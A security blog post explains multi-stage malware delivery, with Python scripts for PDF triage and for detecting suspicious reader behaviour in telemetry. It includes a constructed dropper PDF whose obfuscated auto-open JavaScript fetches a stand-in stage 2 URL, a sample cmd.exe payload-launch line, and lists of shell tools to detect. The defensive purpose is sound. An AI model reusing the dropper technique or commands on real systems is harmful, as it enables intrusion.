Malware Delivery – Understanding Multiple Stage Malware

How trusted file attachments have opened a vector for continued intrusions.

To some of us, seeing an email with malware embedded in a PDF, Word or Excel attachment is common. In fact, it has become the norm for malware delivery to use file types that are not obviously malicious (as opposed to something like a .exe). Gone are the days of wide-open acceptance of every file extension for email attachments. In today's defense-in-depth network designs, one of the layers is naturally email security: scrutinizing messages for embedded links or attachments that could be malicious, scanning attachments for viruses that are detectable, and inspecting mail headers for details that could point to the continued use of a particular "sender" address against an organization.

With malware delivery always evolving to avoid detection, why is multi-stage malware so common? What exactly IS multi-stage malware, and why can it be harder to detect with common defense-in-depth strategies? I recently sat with a customer who ran these questions by me. They were concerned that this might be some new and sophisticated attack being used against their organization that their security team was not aware of. The truth is, this attack method is more common than you might think, and it has been in use for a long time.

Let's start by tackling the easiest questions.

Question: What is multi-stage malware?

Answer: It is malware that is delivered in stages.  Seriously, that's it.

Question: So then what are the stages?

Answer: Ah, I was hoping that was your next question...

The typical stages for the delivery are as follows;

Stage 1: The main goal of the first stage is simply to get some kind of execution on the victim computer in order to retrieve the larger portion of the malware; this piece is often called a downloader or dropper. Using a legitimate-looking file (PDF, DOC, XLS) with the stage 1 code embedded in it, the attacker entices the target to open the file and allow execution. After executing, the first stage may also find some way to make itself persistent. What do I mean by persistent? Let's say that as soon as you open an infected PDF the stage 1 malware begins executing on your computer, but you happen to shut the computer down immediately. If that malware did not create some way to re-execute after the computer starts (a Run key in the registry, a scheduled task or a startup-folder entry are the usual choices), it will not run again until you open the infected PDF again. Attackers know it is unlikely you will re-open the attachment, so they like to build in a way for the malware to re-execute at start-up. That way it is far more likely to finish its initial job, which is to retrieve the next stage.
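A quick way to see what stage 1 looks like inside a "trusted" file type is to look for the PDF features that let a document run something the moment it is opened. The script below is an added example written for this post, not the author's code or any product's: it counts auto-execution and active-content names in a PDF after inflating Flate-compressed streams and undoing the #xx name escapes that malicious PDFs use to hide /JavaScript from naive keyword scanners. The two sample PDFs, the stage 2 URL inside the first one, and the verdict thresholds are all constructed for this example.

```python
import re
import zlib
from typing import Dict

# PDF names whose presence points at auto-execution or external actions. The list and
# the verdict rules below are this example's own (in the spirit of tools such as pdfid).
SUSPICIOUS_NAMES = {
    b"/OpenAction": "action fired as soon as the document is opened",
    b"/AA": "additional actions (page open/close, form and mouse events)",
    b"/JavaScript": "JavaScript action dictionary",
    b"/JS": "JavaScript code (string or stream)",
    b"/Launch": "launches an external application or file",
    b"/EmbeddedFile": "a file carried inside the PDF",
    b"/URI": "opens a URL",
    b"/SubmitForm": "posts form data to a URL",
}
TRIGGERS = {"/OpenAction", "/AA"}
PAYLOADS = {"/JavaScript", "/JS", "/Launch", "/EmbeddedFile", "/URI", "/SubmitForm"}

# A PDF name ends at whitespace or a delimiter, so "/JS" must not match "/JSx".
NAME_PATTERNS = {
    name: re.compile(re.escape(name) + rb"(?![^\s()<>\[\]{}/%])")
    for name in SUSPICIOUS_NAMES
}
NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.DOTALL)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes so an obfuscated /J#61vaScript reads as /JavaScript."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every stream that decompresses as zlib/Flate.

    Object streams and JavaScript are usually FlateDecode-compressed, so the raw bytes
    alone would hide them. decompressobj tolerates the EOL before 'endstream' and
    returns partial output for truncated streams instead of raising.
    """
    parts = [data]
    for m in STREAM_RE.finditer(data):
        try:
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-encoded (e.g. an image) or corrupt
    return b"\n".join(parts)


def scan_pdf(data: bytes) -> Dict[str, int]:
    """Count suspicious names after inflating streams and un-escaping names."""
    text = normalize_names(inflate_streams(data))
    counts = {}
    for name, rx in NAME_PATTERNS.items():
        n = len(rx.findall(text))
        if n:
            counts[name.decode()] = n
    return counts


def assess(findings: Dict[str, int]) -> str:
    """Triage verdict: an auto-execution trigger plus active content is the stage 1 shape."""
    found = set(findings)
    if found & TRIGGERS and found & PAYLOADS:
        return "suspicious: auto-execution trigger with active content"
    if found & PAYLOADS:
        return "review: active content without an auto-execution trigger"
    return "no active content found"


# Constructed sample files (not real malware). The first carries an /OpenAction that
# runs a JavaScript action whose name is hex-escaped and whose code sits in a
# Flate-compressed stream, the way a stage 1 dropper document might.
_JS_STREAM = zlib.compress(b"app.launchURL('http://stage2.example.invalid/s2.bin', true);")
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
    b"4 0 obj\n<< /S /J#61vaScript /JS 5 0 R >>\nendobj\n"
    b"5 0 obj\n<< /Length " + str(len(_JS_STREAM)).encode() + b" /Filter /FlateDecode >>\n"
    + b"stream\n" + _JS_STREAM + b"\nendstream\nendobj\n"
    + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        found = scan_pdf(pdf)
        print(label, found, "->", assess(found))
```

This is triage, not a verdict: benign forms use /AA and /JS legitimately, and the check says nothing about exploit content hidden in fonts or images, so treat a hit as a reason to detonate the file in a sandbox rather than as proof of malware. The same idea carries over to Office documents, where the equivalent trigger is an AutoOpen or Document_Open macro.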

Stage 2: This is where the more capable part of the malware arrives, potentially causing an unfettered amount of damage to the victim computer. Stage 2 typically gives the attacker an array of capabilities that are not available in stage 1, such as:

  • Victim computer screen capture
  • Start webcam
  • Graphical ability to browse victim computer file system
  • Stealing of files and software
  • Deletion of files
  • Elevation or escalation of privileges
  • Keylogging and potential destruction of the victim file system

Furthermore, stage 2 malware may also give the attacker the ability to move to other computers on the same network, which allows far more extensive damage as the attacker spreads out.

Question: Are those the only stages of delivery?

Answer: Not always, but this is the most common arrangement. Sometimes "plugins" or "modules" are available to add to the malware, and they can be delivered or removed on an as-needed basis. The attacker wants to limit the amount of network traffic to a particular domain hosting malware, as that traffic could lead to detection and blocking, which would stop the successful delivery of any future modules, or even of stage 2.

Question: Why stage the delivery at all?  Why not just embed all of the malware instead of a portion in the infected document or file?

Answer: There are a few reasons for staging the delivery, one of them being size. Simply put, if the malware is large enough, embedding the whole thing in a PDF would make the file quite large and therefore more suspicious. Another reason is to limit the possibility of detection by scanners and traffic inspectors. The first stage is lightweight in the commands it runs and the system calls it makes, which helps it evade signature-based and even heuristic detection. It is not uncommon at all to see PDF reader software open a PDF and then immediately connect to the Internet: most PDF readers routinely check for updates as soon as they are opened, and attackers know this to be true often enough. So the stage 1 malware hides within that behavior, reducing the chance that it is noticed. Lastly, developing custom malware is expensive and takes time, so losing the entire piece of malware to detection of any sort can be a huge setback for the attackers. Even if they are using commercial or open source attack tools, rebuilding them to avoid antivirus detection is time consuming and costly. Losing the stage 1 malware to detection is easier to recover from than burning the complete package, so staging the delivery limits the potential loss to the attacker. There are many other reasons to break the malware up and retrieve the rest upon infection, but these are some of the most important ones.

Question: This is making more and more sense to me, but just quickly can you go over why it's much harder to detect?

Answer: The smaller and more deeply embedded the malware is, the harder it is to detect, especially inside a commonly used and trusted file type. When the malware's commands are simple and it needs little from the victim computer in order to execute, detection is again difficult. When malware is overly complicated, or demands a lot from the operating system to function correctly, the chances of detection by defense-in-depth techniques go up. Large, complicated malware is more likely to break and alert the user to its presence, or to be caught by antivirus. It is also more likely to be caught by deep packet inspection at the IDS/IPS layer, because the traffic it generates (beacons, downloads, exfiltration) gives signature writers more to work with. Small, simple malware finds a home inside the most common files and documents, the ones we not only use and open every day but that are also typically allowed as email attachments. Because the malware is small, it can be modified easily, which makes signature development very difficult. Breaking the malware apart also changes which security tools get to inspect it. If stage 1 is delivered by email, it has to get past an IDS/IPS, an email antivirus product (in an enterprise) and any attachment inspection on the email gateway. Stage 2 is delivered only after successful infection, typically when the victim computer asks a particular web server for it. If that request is made over SSL/HTTPS, there is a good chance the download will not be inspected at all until it reaches the host, unless the organization terminates TLS at a proxy. On arrival, the malware has to contend only with antivirus on the victim computer, which a sophisticated attacker can usually bypass or defeat.
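The two detection gaps above, stage 1 hiding inside the reader's normal update check and stage 2 arriving over HTTPS that the network layer cannot see, point at the same host-side control: watch what the document reader process does right after it opens a file. The script below is an added example for this post, not the author's code. It runs a simple analytic over constructed, Sysmon-style process-creation and network-connection events (the hostnames, paths, GUIDs and vendor allowlist are made up for the example) and flags a reader that reaches a host outside its vendor allowlist within two minutes of opening a document, or that spawns a shell or script host.

```python
import json
from datetime import datetime, timedelta
from typing import List

# Document readers that should not normally spawn shells or talk to arbitrary hosts.
READERS = {"acrord32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
# Hosts the reader legitimately contacts on its own (update/CRL checks). Placeholder
# names for this example; derive the real list from baseline traffic.
VENDOR_HOSTS = {"updates.reader-vendor.example", "crl.reader-vendor.example"}
# Child processes that mean "the document got code execution", not "the user printed".
CHILD_SUSPECTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
WINDOW = timedelta(seconds=120)  # how soon after open a connection counts as "on open"

# Constructed Sysmon-style telemetry (EventID 1 = process create, 3 = network connect),
# one JSON object per line. Paths, GUIDs and hostnames are made up for this example.
TELEMETRY = r"""
{"UtcTime":"2017-03-02T09:14:05Z","EventID":1,"Image":"C:\\Program Files\\Reader\\AcroRd32.exe","ProcessGuid":"{A1}","ParentImage":"C:\\Program Files\\Office\\OUTLOOK.EXE","CommandLine":"\"AcroRd32.exe\" \"C:\\Users\\j\\AppData\\Local\\Temp\\invoice.pdf\""}
{"UtcTime":"2017-03-02T09:14:07Z","EventID":3,"Image":"C:\\Program Files\\Reader\\AcroRd32.exe","ProcessGuid":"{A1}","DestinationHostname":"updates.reader-vendor.example","DestinationPort":443}
{"UtcTime":"2017-03-02T09:14:09Z","EventID":3,"Image":"C:\\Program Files\\Reader\\AcroRd32.exe","ProcessGuid":"{A1}","DestinationHostname":"cdn-files.example.invalid","DestinationPort":443}
{"UtcTime":"2017-03-02T09:14:11Z","EventID":1,"Image":"C:\\Windows\\System32\\cmd.exe","ProcessGuid":"{B2}","ParentImage":"C:\\Program Files\\Reader\\AcroRd32.exe","CommandLine":"cmd.exe /c \"%TEMP%\\update.exe\""}
{"UtcTime":"2017-03-02T09:21:30Z","EventID":3,"Image":"C:\\Program Files\\Reader\\AcroRd32.exe","ProcessGuid":"{A1}","DestinationHostname":"docs.partner.example","DestinationPort":443}
"""


def basename(path: str) -> str:
    """Last path component, lower-cased, for either path separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse(jsonl: str) -> List[dict]:
    """Parse JSON-lines telemetry and attach a datetime for ordering and time windows."""
    rows = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    for r in rows:
        r["ts"] = datetime.strptime(r["UtcTime"], "%Y-%m-%dT%H:%M:%SZ")
    return rows


def detect(rows: List[dict]) -> List[str]:
    """Correlate reader process starts with what the same process does next."""
    opens = {}   # ProcessGuid of a reader -> its process-create event
    alerts = []
    for r in sorted(rows, key=lambda e: e["ts"]):
        image = basename(r["Image"])
        if r["EventID"] == 1 and image in READERS:
            opens[r["ProcessGuid"]] = r
        elif (r["EventID"] == 1 and basename(r.get("ParentImage", "")) in READERS
              and image in CHILD_SUSPECTS):
            # Stage 1 getting execution: a document reader should not spawn a shell.
            alerts.append(f"{r['UtcTime']} {basename(r['ParentImage'])} spawned "
                          f"{image}: {r['CommandLine']}")
        elif r["EventID"] == 3 and r["ProcessGuid"] in opens:
            opened = opens[r["ProcessGuid"]]
            host = str(r.get("DestinationHostname") or r.get("DestinationIp", "?")).lower()
            delta = r["ts"] - opened["ts"]
            # Stage 2 retrieval hiding behind the update check: same process, right
            # after open, but to a host that is not the vendor's.
            if host not in VENDOR_HOSTS and delta <= WINDOW:
                alerts.append(f"{r['UtcTime']} {image} reached {host}:{r['DestinationPort']} "
                              f"{int(delta.total_seconds())}s after opening a document "
                              f"({opened['CommandLine']})")
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(TELEMETRY)):
        print(alert)
```

The last event in the sample is a non-vendor connection seven minutes after the open; it falls outside WINDOW and is deliberately not flagged, since by then the user may simply have clicked a link. Tune WINDOW and VENDOR_HOSTS from baseline telemetry in your own environment, and remember that the process-spawn rule fires regardless of the window, because a reader launching cmd.exe is not explained by an update check at any time.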

Question: If it's so damn hard to detect, how on earth do I stop it?

Answer: Excellent question, this is something we can address in my next blog, "Better Host Based Protection, Logically".

By Cory Marchand

Cory Marchand is a trusted subject matter expert on cyber security threats, network and host based assessment and computer forensics. Mr. Marchand has supported several customers over his 10+ years in the field of computer security, including state, federal and military government as well as the private sector. Mr. Marchand holds several industry certifications including CISSP, EnCE, GSEC, GCIA, GCIH, GREM, GSNA and CEH.
